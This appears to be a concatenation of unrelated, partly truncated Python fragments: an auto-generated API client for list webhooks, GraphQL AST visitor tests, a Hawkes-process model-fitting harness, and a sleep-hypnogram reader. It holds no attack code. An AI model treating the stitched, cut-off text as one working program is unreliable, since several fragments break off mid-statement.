query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json', 'application/problem+json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['basicAuth'] # noqa: E501
return self.api_client.call_api(
'/lists/{list_id}/signup-forms', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ListSignupForms', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_list_webhooks(self, list_id, **kwargs): # noqa: E501
"""List webhooks # noqa: E501
Get information about all webhooks for a specific list. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_list_webhooks(list_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str list_id: The unique ID for the list. (required)
:return: ListWebhooks
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_list_webhooks_with_http_info(list_id, **kwargs) # noqa: E501
else:
(data) = self.get_list_webhooks_with_http_info(list_id, **kwargs) # noqa: E501
return data
def get_list_webhooks_with_http_info(self, list_id, **kwargs): # noqa: E501
"""List webhooks # noqa: E501
Get information about all webhooks for a specific list. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_list_webhooks_with_http_info(list_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str list_id: The unique ID for the list. (required)
:return: ListWebhooks
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['list_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_list_webhooks" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'list_id' is set
if ('list_id' not in params or
params['list_id'] is None):
raise ValueError("Missing the required parameter `list_id` when calling ``") # noqa: E501
collection_formats = {}
path_params = {}
if 'list_id' in params:
path_params['list_id'] = params['list_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] | |
# Repository: ThanksBoomerang/graphql-core-legacy
from graphql.language.ast import (
Document,
Field,
Name,
OperationDefinition,
SelectionSet,
)
from graphql.language.parser import parse
from graphql.language.printer import print_ast
from graphql.language.visitor import (
BREAK,
REMOVE,
ParallelVisitor,
TypeInfoVisitor,
Visitor,
visit,
)
from graphql.type import get_named_type, is_composite_type
from graphql.utils.type_info import TypeInfo
from ...validation.tests.utils import test_schema
from .fixtures import KITCHEN_SINK
from typing import Any, List, Optional, Union
from graphql.language.ast import Argument, IntValue
from graphql.language.visitor import _Falsey
def test_allows_editing_a_node_both_on_enter_and_on_leave():
# type: () -> None
ast = parse("{ a, b, c { a, b, c } }", no_location=True)
class TestVisitor(Visitor):
def __init__(self):
# type: () -> None
self.did_enter = False
self.did_leave = False
def enter(
self,
node, # type: Union[Document, OperationDefinition, SelectionSet]
*args # type: Any
):
# type: (...) -> Optional[OperationDefinition]
if isinstance(node, OperationDefinition):
self.did_enter = True
selection_set = node.selection_set
self.selections = None
if selection_set:
self.selections = selection_set.selections
new_selection_set = SelectionSet(selections=[])
return OperationDefinition(
name=node.name,
variable_definitions=node.variable_definitions,
directives=node.directives,
loc=node.loc,
operation=node.operation,
selection_set=new_selection_set,
)
def leave(
self,
node, # type: Union[Document, OperationDefinition, SelectionSet]
*args # type: Any
):
# type: (...) -> Optional[OperationDefinition]
if isinstance(node, OperationDefinition):
self.did_leave = True
new_selection_set = None
if self.selections:
new_selection_set = SelectionSet(selections=self.selections)
return OperationDefinition(
name=node.name,
variable_definitions=node.variable_definitions,
directives=node.directives,
loc=node.loc,
operation=node.operation,
selection_set=new_selection_set,
)
visitor = TestVisitor()
edited_ast = visit(ast, visitor)
assert ast == parse("{ a, b, c { a, b, c } }", no_location=True)
assert edited_ast == ast
assert visitor.did_enter
assert visitor.did_leave
def test_allows_editing_the_root_node_on_enter_and_on_leave():
# type: () -> None
ast = parse("{ a, b, c { a, b, c } }", no_location=True)
definitions = ast.definitions
class TestVisitor(Visitor):
def __init__(self):
# type: () -> None
self.did_enter = False
self.did_leave = False
def enter(self, node, *args):
# type: (Document, *Any) -> Document
if isinstance(node, Document):
self.did_enter = True
return Document(loc=node.loc, definitions=[])
def leave(self, node, *args):
# type: (Document, *Any) -> Document
if isinstance(node, Document):
self.did_leave = True
return Document(loc=node.loc, definitions=definitions)
visitor = TestVisitor()
edited_ast = visit(ast, visitor)
assert edited_ast == ast
assert visitor.did_enter
assert visitor.did_leave
def test_allows_for_editing_on_enter():
# type: () -> None
ast = parse("{ a, b, c { a, b, c } }", no_location=True)
class TestVisitor(Visitor):
def enter(self, node, *args):
# type: (Any, *Any) -> Optional[Any]
if isinstance(node, Field) and node.name.value == "b":
return REMOVE
edited_ast = visit(ast, TestVisitor())
assert ast == parse("{ a, b, c { a, b, c } }", no_location=True)
assert edited_ast == parse("{ a, c { a, c } }", no_location=True)
def test_allows_for_editing_on_leave():
# type: () -> None
ast = parse("{ a, b, c { a, b, c } }", no_location=True)
class TestVisitor(Visitor):
def leave(self, node, *args):
# type: (Union[Field, Name], *Any) -> Optional[_Falsey]
if isinstance(node, Field) and node.name.value == "b":
return REMOVE
edited_ast = visit(ast, TestVisitor())
assert ast == parse("{ a, b, c { a, b, c } }", no_location=True)
assert edited_ast == parse("{ a, c { a, c } }", no_location=True)
def test_visits_edited_node():
# type: () -> None
added_field = Field(name=Name(value="__typename"))
ast = parse("{ a { x } }")
class TestVisitor(Visitor):
def __init__(self):
# type: () -> None
self.did_visit_added_field = False
def enter(self, node, *args):
# type: (Any, *Any) -> Optional[Field]
if isinstance(node, Field) and node.name.value == "a":
selection_set = node.selection_set
selections = []
if selection_set:
selections = selection_set.selections
new_selection_set = SelectionSet(selections=[added_field] + selections)
return Field(name=None, selection_set=new_selection_set)
if node is added_field:
self.did_visit_added_field = True
visitor = TestVisitor()
visit(ast, visitor)
assert visitor.did_visit_added_field
def test_allows_skipping_a_subtree():
# type: () -> None
visited = []
ast = parse("{ a, b { x }, c }")
class TestVisitor(Visitor):
def enter(self, node, *args):
# type: (Any, *Any) -> Optional[Any]
visited.append(["enter", type(node).__name__, getattr(node, "value", None)])
if isinstance(node, Field) and node.name.value == "b":
return False
def leave(self, node, *args):
# type: (Union[Field, Name, SelectionSet], *Any) -> None
visited.append(["leave", type(node).__name__, getattr(node, "value", None)])
visit(ast, TestVisitor())
assert visited == [
["enter", "Document", None],
["enter", "OperationDefinition", None],
["enter", "SelectionSet", None],
["enter", "Field", None],
["enter", "Name", "a"],
["leave", "Name", "a"],
["leave", "Field", None],
["enter", "Field", None],
["enter", "Field", None],
["enter", "Name", "c"],
["leave", "Name", "c"],
["leave", "Field", None],
["leave", "SelectionSet", None],
["leave", "OperationDefinition", None],
["leave", "Document", None],
]
def test_allows_early_exit_while_visiting():
# type: () -> None
visited = []
ast = parse("{ a, b { x }, c }")
class TestVisitor(Visitor):
def enter(self, node, *args):
# type: (Any, *Any) -> Optional[Any]
visited.append(["enter", type(node).__name__, getattr(node, "value", None)])
if isinstance(node, Name) and node.value == "x":
return BREAK
def leave(self, node, *args):
# type: (Union[Field, Name], *Any) -> None
visited.append(["leave", type(node).__name__, getattr(node, "value", None)])
visit(ast, TestVisitor())
assert visited == [
["enter", "Document", None],
["enter", "OperationDefinition", None],
["enter", "SelectionSet", None],
["enter", "Field", None],
["enter", "Name", "a"],
["leave", "Name", "a"],
["leave", "Field", None],
["enter", "Field", None],
["enter", "Name", "b"],
["leave", "Name", "b"],
["enter", "SelectionSet", None],
["enter", "Field", None],
["enter", "Name", "x"],
]
def test_allows_a_named_functions_visitor_api():
# type: () -> None
visited = []
ast = parse("{ a, b { x }, c }")
class TestVisitor(Visitor):
def enter_Name(self, node, *args):
# type: (Name, *Any) -> None
visited.append(["enter", type(node).__name__, getattr(node, "value", None)])
def enter_SelectionSet(self, node, *args):
# type: (SelectionSet, *Any) -> None
visited.append(["enter", type(node).__name__, getattr(node, "value", None)])
def leave_SelectionSet(self, node, *args):
# type: (SelectionSet, *Any) -> None
visited.append(["leave", type(node).__name__, getattr(node, "value", None)])
visit(ast, TestVisitor())
assert visited == [
["enter", "SelectionSet", None],
["enter", "Name", "a"],
["enter", "Name", "b"],
["enter", "SelectionSet", None],
["enter", "Name", "x"],
["leave", "SelectionSet", None],
["enter", "Name", "c"],
["leave", "SelectionSet", None],
]
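# Minimal sketch (not from the original test suite) reusing the same
# enter_<NodeType> naming convention demonstrated above: collect every field
# name in a parsed document.
def collect_field_names(document_ast):
    names = []
    class _Collector(Visitor):
        def enter_Field(self, node, *args):
            names.append(node.name.value)
    visit(document_ast, _Collector())
    return names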
def test_visits_kitchen_sink():
# type: () -> None
visited = []
ast = parse(KITCHEN_SINK)
class TestVisitor(Visitor):
def enter(self, node, key, parent, *args):
# type: (Any, Union[None, int, str], Any, *List[Any]) -> None
kind = parent and type(parent).__name__
if kind == "list":
kind = None
visited.append(["enter", type(node).__name__, key, kind])
def leave(self, node, key, parent, *args):
# type: (Any, Union[int, str], Any, *List[Any]) -> None
kind = parent and type(parent).__name__
if kind == "list":
kind = None
visited.append(["leave", type(node).__name__, key, kind])
visit(ast, TestVisitor())
assert visited == [
["enter", "Document", None, None],
["enter", "OperationDefinition", 0, None],
["enter", "Name", "name", "OperationDefinition"],
["leave", "Name", "name", "OperationDefinition"],
["enter", "VariableDefinition", 0, None],
["enter", "Variable", "variable", "VariableDefinition"],
["enter", "Name", "name", "Variable"],
["leave", "Name", "name", "Variable"],
["leave", "Variable", "variable", "VariableDefinition"],
["enter", "NamedType", "type", "VariableDefinition"],
["enter", "Name", "name", "NamedType"],
["leave", "Name", "name", "NamedType"],
["leave", "NamedType", "type", "VariableDefinition"],
["leave", "VariableDefinition", 0, None],
["enter", "VariableDefinition", 1, None],
["enter", "Variable", "variable", "VariableDefinition"],
["enter", "Name", "name", "Variable"],
["leave", "Name", "name", "Variable"],
["leave", "Variable", "variable", "VariableDefinition"],
["enter", "NamedType", "type", "VariableDefinition"],
["enter", "Name", "name", "NamedType"],
["leave", "Name", "name", "NamedType"],
["leave", "NamedType", "type", "VariableDefinition"],
["enter", "EnumValue", "default_value", "VariableDefinition"],
["leave", "EnumValue", "default_value", "VariableDefinition"],
["leave", "VariableDefinition", 1, None],
["enter", "SelectionSet", "selection_set", "OperationDefinition"],
["enter", "Field", 0, None],
["enter", "Name", "alias", "Field"],
["leave", "Name", "alias", "Field"],
["enter", "Name", "name", "Field"],
["leave", "Name", "name", "Field"],
["enter", "Argument", 0, None],
["enter", "Name", "name", "Argument"],
["leave", "Name", "name", "Argument"],
["enter", "ListValue", "value", "Argument"],
["enter", "IntValue", 0, None],
["leave", "IntValue", 0, None],
["enter", "IntValue", 1, None],
["leave", "IntValue", 1, None],
["leave", "ListValue", "value", "Argument"],
["leave", "Argument", 0, None],
["enter", "SelectionSet", "selection_set", "Field"],
["enter", "Field", 0, None],
["enter", "Name", "name", "Field"],
["leave", "Name", "name", "Field"],
["leave", "Field", 0, None],
["enter", "InlineFragment", 1, None],
["enter", "NamedType", "type_condition", "InlineFragment"],
["enter", "Name", "name", "NamedType"],
["leave", "Name", "name", "NamedType"],
["leave", "NamedType", "type_condition", "InlineFragment"],
["enter", "Directive", 0, None],
["enter", "Name", "name", "Directive"],
["leave", "Name", "name", "Directive"],
["leave", "Directive", 0, None],
["enter", "SelectionSet", "selection_set", "InlineFragment"],
["enter", "Field", 0, None],
["enter", "Name", "name", "Field"],
["leave", "Name", "name", "Field"],
["enter", "SelectionSet", "selection_set", "Field"],
["enter", "Field", 0, None],
["enter", "Name", "name", "Field"],
["leave", "Name", "name", "Field"],
["leave", "Field", 0, None],
["enter", "Field", 1, None],
["enter", "Name", "alias", "Field"],
["leave", "Name", "alias", "Field"],
["enter", "Name", "name", "Field"],
["leave", "Name", "name", "Field"],
["enter", "Argument", 0, None],
["enter", "Name", "name", "Argument"],
["leave", "Name", "name", "Argument"],
["enter", "IntValue", "value", "Argument"],
["leave", "IntValue", "value", "Argument"],
["leave", "Argument", 0, None],
["enter", "Argument", 1, None],
["enter", "Name", "name", "Argument"],
["leave", "Name", "name", "Argument"],
["enter", "Variable", "value", "Argument"],
["enter", "Name", "name", "Variable"],
["leave", "Name", "name", "Variable"],
["leave", "Variable", "value", "Argument"],
["leave", "Argument", 1, None],
["enter", "Directive", 0, None],
["enter", "Name", "name", | |
"""
Test harness for fitting the competing models.
"""
import time
import pickle
import copy
import os
import gzip
import numpy as np
from collections import namedtuple
from pybasicbayes.util.text import progprint_xrange
# Use the Agg backend if running on a server without the DISPLAY variable
if "DISPLAY" not in os.environ:
import matplotlib
matplotlib.use('Agg')
from pyhawkes.utils.utils import convert_discrete_to_continuous
from pyhawkes.models import DiscreteTimeNetworkHawkesModelGammaMixture, \
DiscreteTimeNetworkHawkesModelGammaMixtureSBM, \
DiscreteTimeNetworkHawkesModelSpikeAndSlab, \
ContinuousTimeNetworkHawkesModel
from pyhawkes.standard_models import ReluNonlinearHawkesProcess, StandardHawkesProcess, ExpNonlinearHawkesProcess, HomogeneousPoissonProcess
Results = namedtuple("Results", ["samples", "timestamps", "lps", "test_lls"])
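# Hedged helper sketch (not part of the original harness): given a dict of
# {model_name: Results}, print the final held-out log likelihood and the
# cumulative wall-clock time of each fit, using the namedtuple fields above.
def summarize_results(results_by_model):
    for name, res in sorted(results_by_model.items()):
        print("{:>30s}  final test ll: {:12.2f}   time: {:9.1f}s".format(
            name, res.test_lls[-1], res.timestamps[-1]))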
def fit_homogeneous_pp_model(S, S_test, dt, dt_max, output_path,
model_args={}):
T,K = S.shape
# Check for existing Gibbs results
test_model = HomogeneousPoissonProcess(K=K, dt=dt, dt_max=dt_max, **model_args)
test_model.add_data(S)
# Initialize the background rates to their mean
test_model.initialize_to_background_rate()
lps = [test_model.log_likelihood()]
hlls = [test_model.heldout_log_likelihood(S_test)]
# Convert to arrays
lps = np.array(lps)
hlls = np.array(hlls)
timestamps = np.array([0])
# Make results object
results = Results([test_model.copy_sample()], timestamps, lps, hlls)
return results
def fit_standard_hawkes_model_bfgs(S, S_test, dt, dt_max, output_path,
standard_model=None,
model_args={}):
T,K = S.shape
# Check for existing Gibbs results
if os.path.exists(output_path):
with gzip.open(output_path, 'r') as f:
print("Loading standard BFGS results from ", output_path)
results = pickle.load(f)
else:
# Split into test and training
xv_len = 1000
S_train = S[:-xv_len]
S_xv = S[-xv_len:]  # hold out the last xv_len bins for cross-validation
def _fit(lmbda):
print("Fitting a standard Hawkes model using BFGS")
test_model = StandardHawkesProcess(K=K, dt=dt, dt_max=dt_max, lmbda=lmbda, **model_args)
test_model.add_data(S_train)
# Initialize the background rates to their mean
test_model.initialize_to_background_rate()
lps = [test_model.log_likelihood()]
hlls = [test_model.heldout_log_likelihood(S_test)]
# Fit with BFGS
tic = time.clock()
test_model.fit_with_bfgs()
init_time = time.clock() - tic
lps.append(test_model.log_likelihood())
hlls.append(test_model.heldout_log_likelihood(S_test))
# Convert to arrays
lps = np.array(lps)
hlls = np.array(hlls)
timestamps = np.array([0, init_time])
# Make results object
results = Results([test_model.copy_sample()], timestamps, lps, hlls)
# Compute cross validation log likelihood
xv_ll = test_model.heldout_log_likelihood(S_xv)
return xv_ll, results
# Fit models with a range of regularization parameters
lmbdas = [.1, 1., 5., 10.]
xv_lls = []
xv_results = []
for lmbda in lmbdas:
xv_ll, results = _fit(lmbda)
xv_lls.append(xv_ll)
xv_results.append(results)
# Find the best
for lmbda, xv_ll in zip(lmbdas, xv_lls):
print("Lambda: ", lmbda, "\tXV LL: ", xv_ll)
best = np.argmax(xv_lls)
results = xv_results[best]
print("Best: ", best)
# Save the model
with gzip.open(output_path, 'w') as f:
print("Saving std BFGS results to ", output_path)
pickle.dump(results, f, protocol=-1)
return results
def fit_nonlinear_hawkes_model_bfgs(S, S_test, dt, dt_max, output_path,
model_args={}):
T,K = S.shape
# Check for existing Gibbs results
if os.path.exists(output_path):
with gzip.open(output_path, 'r') as f:
print("Loading nonlinear BFGS results from ", output_path)
results = pickle.load(f)
else:
# Split into test and training
xv_len = int(0.01 * len(S))
S_train = S[:-xv_len]
S_xv = S[-xv_len:]  # hold out the last xv_len bins for cross-validation
def _fit(lmbda):
print("Fitting a nonlinear Hawkes model using BFGS")
test_model = ReluNonlinearHawkesProcess(K=K, dt=dt, dt_max=dt_max, lmbda=lmbda, **model_args)
test_model.add_data(S_train)
# Initialize the background rates to their mean
test_model.initialize_to_background_rate()
lps = [test_model.log_likelihood()]
hlls = [test_model.heldout_log_likelihood(S_test)]
# Fit with BFGS
tic = time.clock()
test_model.fit_with_bfgs()
init_time = time.clock() - tic
lps.append(test_model.log_likelihood())
hlls.append(test_model.heldout_log_likelihood(S_test))
# Convert to arrays
lps = np.array(lps)
hlls = np.array(hlls)
timestamps = np.array([0, init_time])
# Make results object
results = Results([test_model.copy_sample()], timestamps, lps, hlls)
# Compute cross validation log likelihood
xv_ll = test_model.heldout_log_likelihood(S_xv)
return xv_ll, results
# Fit models with a range of regularization parameters
lmbdas = [.1, 1., 5., 10.]
xv_lls = []
xv_results = []
for lmbda in lmbdas:
xv_ll, results = _fit(lmbda)
xv_lls.append(xv_ll)
xv_results.append(results)
# Find the best
for lmbda, xv_ll in zip(lmbdas, xv_lls):
print("Lambda: ", lmbda, "\tXV LL: ", xv_ll)
best = np.argmax(xv_lls)
results = xv_results[best]
print("Best: ", best)
# Save the model
with gzip.open(output_path, 'w') as f:
print("Saving nonlinear BFGS results to ", output_path)
pickle.dump(results, f, protocol=-1)
return results
def fit_spikeslab_network_hawkes_gibbs(S, S_test, dt, dt_max, output_path,
model_args={}, standard_model=None,
N_samples=100, time_limit=8*60*60):
T,K = S.shape
# Check for existing Gibbs results
if os.path.exists(output_path):
with gzip.open(output_path, 'r') as f:
print("Loading Gibbs results from ", output_path)
results = pickle.load(f)
else:
print("Fitting the data with a network Hawkes model using Gibbs sampling")
test_model = DiscreteTimeNetworkHawkesModelSpikeAndSlab(K=K, dt=dt, dt_max=dt_max, **model_args)
test_model.add_data(S)
# Initialize with the standard model parameters
if standard_model is not None:
test_model.initialize_with_standard_model(standard_model)
# TODO: Precompute F_test
F_test = test_model.basis.convolve_with_basis(S_test)
# Gibbs sample
samples = []
lps = [test_model.log_probability()]
hlls = [test_model.heldout_log_likelihood(S_test)]
times = [0]
for _ in progprint_xrange(N_samples, perline=10):
# Update the model
tic = time.time()
test_model.resample_model()
samples.append(copy.deepcopy(test_model.get_parameters()))
times.append(time.time() - tic)
# Compute log probability and heldout log likelihood
# lps.append(test_model.log_probability())
hlls.append(test_model.heldout_log_likelihood(S_test, F=F_test))
# # Save this sample
# with open(output_path + ".gibbs.itr%04d.pkl" % itr, 'w') as f:
# cPickle.dump(samples[-1], f, protocol=-1)
# Check if time limit has been exceeded
if np.sum(times) > time_limit:
break
# Get cumulative timestamps
timestamps = np.cumsum(times)
lps = np.array(lps)
hlls = np.array(hlls)
# Make results object
results = Results(samples, timestamps, lps, hlls)
# Save the Gibbs samples
with gzip.open(output_path, 'w') as f:
print("Saving Gibbs samples to ", output_path)
pickle.dump(results, f, protocol=-1)
return results
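# Hedged call sketch (argument values are made up): S and S_test are (T, K)
# arrays of per-bin event counts at resolution dt; e.g.
#   results = fit_spikeslab_network_hawkes_gibbs(
#       S, S_test, dt=1.0, dt_max=10.0,
#       output_path="results/spikeslab_gibbs.pkl.gz", N_samples=200)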
def fit_ct_network_hawkes_gibbs(S, S_test, dt, dt_max, output_path,
model_args={}, standard_model=None,
N_samples=100, time_limit=8*60*60):
K = S.shape[1]
S_ct, C_ct, T = convert_discrete_to_continuous(S, dt)
S_test_ct, C_test_ct, T_test = convert_discrete_to_continuous(S_test, dt)
# Check for existing Gibbs results
if os.path.exists(output_path):
with gzip.open(output_path, 'r') as f:
print("Loading Gibbs results from ", output_path)
results = pickle.load(f)
else:
print("Fitting the data with a continuous time network Hawkes model using Gibbs sampling")
test_model = \
ContinuousTimeNetworkHawkesModel(K, dt_max=dt_max, **model_args)
test_model.add_data(S_ct, C_ct, T)
# Initialize with the standard model parameters
if standard_model is not None:
test_model.initialize_with_standard_model(standard_model)
# Gibbs sample
samples = []
lps = [test_model.log_probability()]
hlls = [test_model.heldout_log_likelihood(S_test_ct, C_test_ct, T_test)]
times = [0]
for _ in progprint_xrange(N_samples, perline=25):
# Update the model
tic = time.time()
test_model.resample_model()
times.append(time.time() - tic)
samples.append(copy.deepcopy(test_model.get_parameters()))
# Compute log probability and heldout log likelihood
# lps.append(test_model.log_probability())
hlls.append(test_model.heldout_log_likelihood(S_test_ct, C_test_ct, T_test))
# # Save this sample
# with open(output_path + ".gibbs.itr%04d.pkl" % itr, 'w') as f:
# cPickle.dump(samples[-1], f, protocol=-1)
# Check if time limit has been exceeded
if np.sum(times) > time_limit:
break
# Get cumulative timestamps
timestamps = np.cumsum(times)
lps = np.array(lps)
hlls = np.array(hlls)
# Make results object
results = Results(samples, timestamps, lps, hlls)
# Save the Gibbs samples
with gzip.open(output_path, 'w') as f:
print("Saving Gibbs samples to ", output_path)
pickle.dump(results, f, protocol=-1)
return results
def fit_network_hawkes_vb(S, S_test, dt, dt_max, output_path,
model_args={}, standard_model=None,
N_samples=100, time_limit=8*60*60):
T,K = S.shape
# Check for existing Gibbs results
if os.path.exists(output_path):
with gzip.open(output_path, 'r') as f:
print("Loading VB results from ", output_path)
results = pickle.load(f)
else:
print("Fitting the data with a network Hawkes model using batch VB")
test_model = DiscreteTimeNetworkHawkesModelGammaMixtureSBM(K=K, dt=dt, dt_max=dt_max,
**model_args)
test_model.add_data(S)
# Initialize with the standard model parameters
if standard_model is not None:
test_model.initialize_with_standard_model(standard_model)
# Precompute F_test
F_test = test_model.basis.convolve_with_basis(S_test)
# Initialize with the standard model parameters
if standard_model is not None:
test_model.initialize_with_standard_model(standard_model)
# Batch variational inference
samples = []
lps = [test_model.log_probability()]
hlls = [test_model.heldout_log_likelihood(S_test)]
times = [0]
for itr in progprint_xrange(N_samples):
# Update the model
tic = time.time()
test_model.meanfield_coordinate_descent_step()
times.append(time.time() - tic)
# Resample from variational posterior to compute log prob and hlls
test_model.resample_from_mf()
# samples.append(test_model.copy_sample())
samples.append(copy.deepcopy(test_model.get_parameters()))
# Compute log probability and heldout log likelihood
# lps.append(test_model.log_probability())
hlls.append(test_model.heldout_log_likelihood(S_test, F=F_test))
# Save this sample
# with open(output_path + ".svi.itr%04d.pkl" % itr, 'w') as f:
# cPickle.dump(samples[-1], f, protocol=-1)
# Check if time limit has been exceeded
if np.sum(times) > time_limit:
break
# Get cumulative timestamps
timestamps = np.cumsum(times)
lps = np.array(lps)
hlls = np.array(hlls)
# Make results object
results = Results(samples, timestamps, lps, hlls)
# Save the Gibbs samples
with gzip.open(output_path, 'w') as f:
print("Saving VB samples to ", output_path)
pickle.dump(results, f, protocol=-1)
return results
def fit_network_hawkes_svi(S, S_test, dt, dt_max, output_path,
model_args={}, standard_model=None,
N_samples=100, time_limit=8*60*60,
delay=10.0,
forgetting_rate=0.25):
T,K = S.shape
# Check for existing Gibbs results
if os.path.exists(output_path):
with gzip.open(output_path, 'r') as f:
print("Loading SVI results from ", output_path)
results = pickle.load(f)
else:
print("Fitting the data with a network Hawkes model using SVI")
test_model = DiscreteTimeNetworkHawkesModelGammaMixtureSBM(K=K, dt=dt, dt_max=dt_max,
**model_args)
test_model.add_data(S)
# Initialize with the standard model parameters
if standard_model is not None:
test_model.initialize_with_standard_model(standard_model)
# Precompute F_test
F_test = test_model.basis.convolve_with_basis(S_test)
# Initialize with the standard model parameters
if standard_model is not None:
test_model.initialize_with_standard_model(standard_model)
# TODO: Add the data in minibatches
minibatchsize = 3000
stepsize = (np.arange(N_samples) + delay)**(-forgetting_rate)
# Stochastic variational inference
samples = []
lps = [test_model.log_probability()]
hlls = [test_model.heldout_log_likelihood(S_test)]
times = | |
# sleep_utils.py
# -*- coding: utf-8 -*-
"""
Created on Thu Nov 21 20:19:26 2019
@author: skjerns
"""
from pyedflib.highlevel import *
import os
import gc
import warnings
import ospath #pip install https://github.com/skjerns/skjerns-utils
import numpy as np
import pyedflib #pip install https://github.com/skjerns/pyedflib/archive/custom_version.zip
import time
from tqdm import tqdm
from datetime import datetime
import dateparser
import logging
from joblib import Parallel, delayed
import matplotlib.pyplot as plt
from lspopt import spectrogram_lspopt
import matplotlib
def read_hypnogram(hypno_file, epochlen = 30, epochlen_infile=None, mode='auto', exp_seconds=None):
"""
reads a hypnogram file as created by VisBrain or as CSV type
:param hypno_file: a path to the hypnogram
:param epochlen: how many seconds per label in output
:param epochlen_infile: how many seconds per label in original file
:param mode: 'auto', 'time' or 'csv', see SleepDev/docs/hypnogram.md
:param exp_seconds: How many seconds does the matching recording have?
"""
# type checks: int() == 0, so these asserts require integer arguments
assert str(type(epochlen)()) == '0'
assert epochlen_infile is None or str(type(epochlen_infile)()) == '0'
with open(hypno_file, 'r') as file:
content = file.read()
content = content.replace('\r', '') # remove windows style \r\n
#conversion dictionary
conv_dict = {'WAKE':0, 'WACH':0, 'WK':0, 'NWAKE': 0,
'N1': 1, 'NREM1': 1,
'N2': 2, 'NREM2': 2,
'N3': 3, 'NREM3': 3,
'N4':3, 'NREM4': 3,
'REM': 4,
0:0, 1:1, 2:2, 3:3, 4:4, -1:5, 5:5,
'ART': 5, 'A':5, 'ARTEFAKT':5, '8': 5,
'MT':5, 'BEWEGUNG':5, '9':5, '?': 5, ' ': 5, 'NAN': 5,
'UNSCORED': 5}
lines = content.split('\n')
if mode=='auto':
if lines[0].startswith('*'): # if there is a star, we assume it's the visbrain type
mode = 'visbrain'
elif lines[0].replace('-', '').isnumeric():
mode = 'csv'
elif lines[0].startswith('[HypnogramAASM]'):
mode = 'dreams'
elif lines[0].startswith(' Epoch Number ,Start Time ,Sleep Stage'):
mode = 'alice'
elif 'abstime' in lines[0]:
mode = 'dat'
elif lines[0].startswith('Signal ID:'):
mode = 'somnoscreen'
elif any(['luna-' in x for x in lines[:5]]):
mode = 'luna'
elif hypno_file.endswith('.eannot'):
mode = 'csv'
else:
mode = None
# reading file in format as used by <NAME>
# files with a datestamp per stage annotation
if mode=='dat':
if epochlen_infile is not None:
warnings.warn('epochlen_infile has been supplied, but hypnogram is '
'time based, will be ignored')
elif exp_seconds and not epochlen_infile:
epochlen_infile=exp_seconds//len(lines)
print('[INFO] Assuming csv annotations with one entry per {} seconds'.format(epochlen_infile))
stages = []
for line1, line2 in zip(lines[1:-1], lines[2:]):
if len(line1.strip())==0: continue # skip empty lines
if len(line2.strip())==0: continue # skip empty lines
curr_t, _, stage, *_ = line1.split('\t')
next_t,*_ = line2.split('\t')
curr_t = datetime.strptime(curr_t, '%Y-%m-%d %H:%M:%S')
next_t = datetime.strptime(next_t, '%Y-%m-%d %H:%M:%S')
assert next_t > curr_t, 'timestamp 2 is smaller than 1? {} < {}'.format(next_t, curr_t)
sec_diff = (next_t - curr_t).seconds
if exp_seconds and epochlen_infile!=sec_diff:
warnings.warn('Epochlen in file is {} but {} would be selected'.format(sec_diff, epochlen_infile))
stage = conv_dict[stage.upper()]
stages.extend([stage]*sec_diff)
elif mode=='somnoscreen':
if epochlen_infile is not None:
warnings.warn('epochlen_infile has been supplied, but information is in file, will be ignored')
epochlen_infile = int(lines[5].replace('Rate: ', '').replace('s',''))
stages = []
for line in lines[6:]:
if len(line.strip())==0: continue # skip empty lines
_,stage = line.split('; ')
stage = conv_dict[stage.upper()]
stages.extend([stage]*epochlen_infile)
# read hypnogram as written by visbrain (time based)
elif mode=='visbrain':
if epochlen_infile is not None:
warnings.warn('epochlen_infile has been supplied, but hypnogram is time based, '
'will be ignored')
stages = []
prev_t = 0
for line in lines:
if len(line.strip())==0: continue
if line[0] in '*#%/\\"\'': continue # this line seems to be a comment
s, t = line.split('\t')
t = float(t)
s = conv_dict[s.upper()]
l = int(np.round((t-prev_t))) # length of this stage
stages.extend([s]*l)
prev_t = t
# read hypnogram as simple CSV file, number based or string based
elif mode=='csv':
if exp_seconds and not epochlen_infile:
epochlen_infile=exp_seconds//len(lines)
print('[INFO] Assuming csv annotations with one entry per {} seconds'.format(epochlen_infile))
elif epochlen_infile is None:
if len(lines) < 2500: # we assume no recording is longer than 21 hours
epochlen_infile = 30
else:
epochlen_infile = 1
print('[INFO] Assuming csv annotations are per second')
lines = [conv_dict[l.upper()] if isinstance(l, str) else int(l) for l in lines if len(l)>0]
lines = [[line]*epochlen_infile for line in lines]
stages = np.array(lines).flatten()
# for the Dreams Database
# http://www.tcts.fpms.ac.be/~devuyst/Databases/DatabaseSubjects/
elif mode=='dreams':
epochlen_infile = 5
conv_dict = {-2:5,-1:5, 0:5, 1:3, 2:2, 3:1, 4:4, 5:0}
lines = [[int(line)] for line in lines[1:] if len(line)>0]
lines = [[line]*epochlen_infile for line in lines]
stages = np.array([conv_dict[l] for l in np.array(lines).flatten()])  # entries are already ints here
# for hypnogram created with Alice 5 software
elif mode=='alice':
epochlen_infile = 30
lines = [line.split(',')[-1] for line in lines[1:] if len(line)>0]
lines = [[line]*epochlen_infile for line in lines]
try: stages = np.array([conv_dict[l] for l in np.array(lines).flatten()])
except KeyError as e:
print('Unknown sleep stage in file')
raise e
